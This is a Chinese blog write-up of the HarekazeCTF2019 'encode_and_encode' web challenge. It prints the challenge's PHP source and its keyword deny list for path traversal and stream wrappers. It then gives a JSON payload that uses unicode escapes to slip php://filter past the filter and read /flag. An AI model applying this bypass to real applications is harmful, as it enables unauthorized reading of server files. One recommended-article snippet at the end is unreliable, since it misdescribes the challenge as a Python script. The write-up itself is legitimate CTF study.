[HarekazeCTF2019]encode_and_encode

最新推荐文章于 2024-08-03 16:56:27 发布
最新推荐文章于 2024-08-03 16:56:27 发布
阅读量391 收藏
点赞数 1
分类专栏: CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62905261/article/details/125956021
版权

[HarekazeCTF2019]encode_and_encode

 依次点进去分别发现了:

<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

$body = file_get_contents('php://input');
$json = json_decode($body, true);

if (is_valid($body) && isset($json) && isset($json['page'])) {
  $page = $json['page'];
  $content = file_get_contents($page);
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);
function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
    return false;
  }
  return true;
}

审计上面代码得知,过滤了很多的关键字

$body = file_get_contents('php://input');
$json = json_decode($body, true);

审计上面代码得知,我们需要用json的方式传page,并且会用到伪协议,并且会涉及到php file_get_contents函数:

php file_get_contents()函数:

定义与用法:

file_get_contents() 函数把整个文件读入一个字符串中。

和 file() 一样,不同的是 file_get_contents() 把文件读入一个字符串。

file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法。如果操作系统支持,还会使用内存映射技术来增强性能。

语法:

file_get_contents(path,include_path,context,start,max_length)

参数:

path必需。规定要读取的文件。
include_path可选。如果您还想在 include_path(在 php.ini 中)中搜索文件的话,请设置该参数为 '1'。
context可选。规定文件句柄的环境。context 是一套可以修改流的行为的选项。若使用 NULL,则忽略。
start可选。规定在文件中开始读取的位置。该参数是 PHP 5.1 中新增的。
max_length可选。规定读取的字节数。该参数是 PHP 5.1 中新增的。

提示和注释:

提示:该函数是二进制安全的。(意思是二进制数据(如图像)和字符数据都可以使用此函数写入。)

示例:

<?php

echo file_get_contents("test.txt");

?>

上面的代码将输出:

This is a test with test text.

构造payload:

{"page":"php://filter/convert.base64-encode/resource=/flag"}

但是由于关键字flag、php都被禁用了,可以利用unicode编码来代替,构造新的payload:

{"page":"\u0070\u0068\u0070://filter/convert.base64-encode/resource=/\u0066\u006c\u0061\u0067"}

利用bp传一下数据,当抓包后点击about的时候,页面出来了{"page":"pages/about.html"},所以就用这个页面进行传值,就得到了base64加密字符串:

解密即得flag:

一夜至秋.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF比赛编码工具Captfencoder-1.3.0
09-21
CaptfEncoder是一款跨平台网络安全工具套件,提供网络安全相关编码转换、古典密码、密码学、特殊编码等工具,并聚合各类在线工具。Ascii Encoding Web Encoding Hex Encoding Unicode Encoding Base64(Base16、Base32、Base58) Url Encoding Html Entity Encoding Escape Encoding Quoted-printable(可打印字符引用编码) Morse Code(莫尔斯电码) Tap Code(敲击码)
jpeg-encode.zip_jpeg_jpeg encode_jpeg encode linux_linux视频监控_视频监
07-15
标题中的“jpeg-encode.zip_jpeg_jpeg encode_jpeg encode linux_linux视频监控_视频监”表明这个压缩包可能包含了一组用于在Linux环境下进行JPEG编码的工具或代码库,特别适用于资源有限的嵌入式系统,例如视频监控...
CTF入门之常见的编码(持续更新中ing)
最新发布
Aluxian_的博客
08-03 1242
其编码原理是:Base58的标准索引表中去掉了容易产生歧义的字符,如0(零)和O(大写字母O)、I(大写的字母I)和l(小写的字母L),以及影响双击选择的字符,如/和+。摩斯码是由点()和划(-)这两种符号组成的信号代码,通过不同的排列顺序来表达不同的英文字母、数字和标点符号。XXencode编码输出时的格式和UUencode相似,每60个字符为独立的一行,每行的开头会加上长度字符,除了最后一行之外,长度字符都应该是“h”(索引表中第45位),最后一行的长度字符为字节数在索引表中位置所代表字符。
encode.rar_15 11汉明码_Matlab中encode_breakfastarr_matlab里encode_(1
07-15
这个压缩包文件“encode.rar_15 11汉明码_Matlab中encode_breakfastarr_matlab里encode_(1”包含了使用MATLAB实现(15,11)汉明码编码和解码过程的资源。 MATLAB是一款强大的数学计算软件,广泛应用于科研和工程...
JPEG_Encode_verilog.rar_JPEG verilog_JPEG_Encode_verilog_Verilo
09-20
在“JPEG_Encode_verilog”这个项目中,Verilog源代码被用于创建一个硬件级别的JPEG编码器。Verilog是一种硬件描述语言(HDL),常用于设计数字系统的逻辑,包括FPGA和ASIC等。使用Verilog可以将JPEG编码过程的算法...
encode_geohash.rar_geohash_geohash encode_matlab与geohash
09-23
在给定的“encode_geohash.rar”压缩包中,包含了一个名为“encode_geohash.m”的MATLAB程序,这是对GeoHash编码的一种实现。MATLAB作为一种强大的数学计算环境,常用于各种科学计算和数据分析,包括地理信息系统...
Turbo_encode_decode.rar_sova算法_turbo decode_turbo encode_turbo e
07-14
Turbo码编译码的matlab源代码,包括logMAP算法与SOVA算法。可设置信道SNR参数,帧长度,删余系数等。
[HarekazeCTF2019]encode_and_encode 1
wuyaowangchuan的博客
03-04 836
源代码里面有代码 <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):'.
[HarekazeCTF2019]encode_and_encode(json字符转义)
qq_44657899的博客
11-14 960
<?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob|data|tp|zip|zlib|phar):', // n.
[harekazectf2019]encode_and_encode
04-06
题目描述: 题目里给出了一个Python脚本,我们需要分析一下这个脚本是干什么的,并且对脚本进行改进,使得加密算法更加强大。 题目解析: 我们首先来看一下这个Python脚本的主体代码: import base64 import codecs import hashlib txt = 'HarekazeCTF{TestTestTest}' txt = hashlib.sha512(txt.encode('ascii')).hexdigest() txt = codecs.encode(txt.encode('ascii'), 'rot13') txt = base64.b64encode(txt.encode('ascii')).decode('ascii') txt = txt.replace('=', '') print(txt) 大概的意思是,先对一个字符串进行sha512哈希,将结果转化为rot13编码,然后再用base64编码,最后移除等号。这里的等号主要是用来填充字节数的,我们可以通过移除等号的方式来隐藏字节数,使得加密算法更加强大。 那么我们接下来就考虑实现一个更加高级的加密算法。或者说,我们需要在Python脚本里构建一个加密函数,将输入的字符串进行加密之后输出。 我们可以使用一些前沿的加密技术,比如AES、RSA、ECDSA等等,这些算法同样也可以在Python脚本里面直接调用。不过这些算法需要对输入的字符串进行一些特殊的格式化处理,一般来说先需要将字符串转化为字节流(bytes),然后再通过算法对字节流进行加密。最后还需要对加密后的字节流进行一些编码转换的操作,比如base64编码和十六进制编码等。 具体来讲,我们可以使用以下几个Python库来实现一个高级加密算法: hashlib:用来实现哈希算法的Python标准库。 pycryptodome:用来实现加密算法的Python第三方库,支持多种加密算法,如AES、RSA、ECDSA等。 base64:用来实现base64编码的Python标准库。 codecs:用来实现其他编码转换的Python标准库。 具体用法可以参考PyCryptodome的官方文档。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值